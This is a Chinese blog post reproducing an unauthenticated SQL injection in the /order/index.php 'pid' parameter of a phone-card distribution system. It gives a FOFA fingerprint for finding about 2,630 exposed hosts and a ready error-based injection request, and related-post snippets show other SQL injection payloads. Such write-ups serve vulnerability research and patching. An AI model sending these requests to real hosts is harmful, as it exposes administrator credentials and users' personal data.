号卡极团分销管理系统 index.php SQL注入漏洞(含批量验证poc)

已于 2024-04-08 14:14:59 修改
阅读量115 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: php sql 开发语言 web安全
于 2024-04-08 14:14:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137507420
版权

产品简介

号卡极团分销管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U1+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接!

漏洞概述

号卡极团分销管理系统 /order/index.php 接口存在 SQL注入漏洞只,未经身份验证攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

网络测绘

fofa:icon_hash=”-795291075”

网络资产数量:
2,630 条匹配结果

漏洞复现

POC

GET /order/index.php?pid=1%27%20AND%20(extractvalue(1,concat(0x7e,(select%20version()),0x7e)));--%20htjf HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection:
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3460
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞复现 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
瑞友天翼2024SQL注入漏洞poc
02-27
瑞友天翼2024SQL注入漏洞poc
致翔OA漏洞学习——msglog.aspx SQL注入漏洞
记录并分享学习安全的知识点..
05-02 2919
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。注:注入参数为user。
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7371
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 1390
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 3259
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
2021.4.8 护网 0day漏洞 POC漏洞示例
04-08
亲测真实有效,如有侵权请联系CSDN管理员删除即可
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1036
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
supervisor 简单理解
qq_42857358的博客
04-28 235
test.ini文件内容。
Debian 德比安 Nginx + PHP + MySql + beanstalkd + Redis + Node.js
HzqGhost's Blog
04-29 547
网卡模式选择桥接 mirrors.163.com阿里镜像源DeBian 安装软件选择时勾选上apt updateapt install sudo #安装 sudousermod -aG sudo username #添加普通账到 sudo让 root 可以 SSH配置文件 /etc/ssh/sshd_config找到 PermitRootLogin 选项 并将其值修改为重启ssh先在 VirtualBox 上添加好。
2024 XYCTF Web 方向 wp 全解
qq_39947980的博客
04-27 1062
XYCTF 2024 Web 方向全解
桌面运维岗面试三十问
一坨小橙子的博客
04-28 736
桌面运维岗面试问题及答案汇总
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 285
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否复合、暗恋对象、是否分手、爱着别人、大师服务(包多项功能)共计30余项功能,全网功能全,完善的版本。
牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
weixin_37991016的博客
04-27 276
【代码】牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
网络之路29:三层链路聚合
衡水铁头哥的博客
04-28 674
正文共:1666 字 17 图,预估阅读时间:3 分钟目录网络之路第一章:Windows系统中的网络0、序言 1、Windows系统中的网络 1.1、桌面中的网卡 1.2、命令行中的网卡 1.3、路由表 1.4、家用路由器网络之路第二章:认识企业设备2、认识企业设备 2.1、MSR810-W外观 2.2、登录MSR810-W管理页面 2.3、快速设置上网 2.4、WLAN配置 2...
计算机毕业设计PHP+vue体检预约管理系统d1yu38
最新发布
专注分享bishe530的博客
05-02 257
人民医院体检预约系统分为前台和后台两部分,其中前台部分主要是给患者使用的,主要功能包括,患者的注册登录,查看和预约体检列表,查看和预约体检套餐,体验咨询的查看,在线联系客服等内容;后台部分主要是给管理人员使用的,主要功能包括个人中心,用户管理,体检列表管理,体检类型管理,预约管理,上传体检报告管理,体验套餐管理,套餐类目管理,套餐预约管理,系统管理等功能,通过这些功能可以患者更好的了解医护相关的知识和动态,同时方便了用户的在线体验套餐。通过本次系统设计可以提高自己的编程能力,强化对所学知识的理解和运用。
编写一个能够验证dvwasql注入漏洞poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_injection_vulnerability(url): payload = "' OR '1'='1' -- " response = requests.get(url + "?id=" + payload) if "Error" in response.text: print("该网站存在 SQL 注入漏洞!") else: print("该网站不存在 SQL 注入漏洞。") # 在这里替换为你的 DVWA 网站的 URL dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/" check_sql_injection_vulnerability(dvwa_url) ``` 请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。 请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值